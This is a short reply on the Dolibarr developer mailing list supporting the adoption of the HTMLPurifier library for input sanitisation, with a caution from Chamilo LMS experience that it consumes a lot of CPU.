> Hello there, > > > > I had a look on http://htmlpurifier.org. This library clean up var against > wished HTML tag. > > I think including this library in Dolibarr could greatly improve security > especially for fields where fckeditor used. >
I'll second that. I remember when suggesting to filter input in Dolibarr 2, I was answered (at the time) that the users of Dolibarr were generally reliable and that there was no need for filtering. I hope this has changed :-) We use HTMLPurifier in Chamilo LMS, and with very good results, but beware that it is a *huge* CPU consumer. So much that we actually had to disable some of its filtering features. I don't think it would impact much in Dolibarr as the number of simultaneous users is relatively low, but it's good to know. Cheers, Yannick _______________________________________________ Dolibarr-dev mailing list Dolibarr-dev@nongnu.org https://lists.nongnu.org/mailman/listinfo/dolibarr-dev
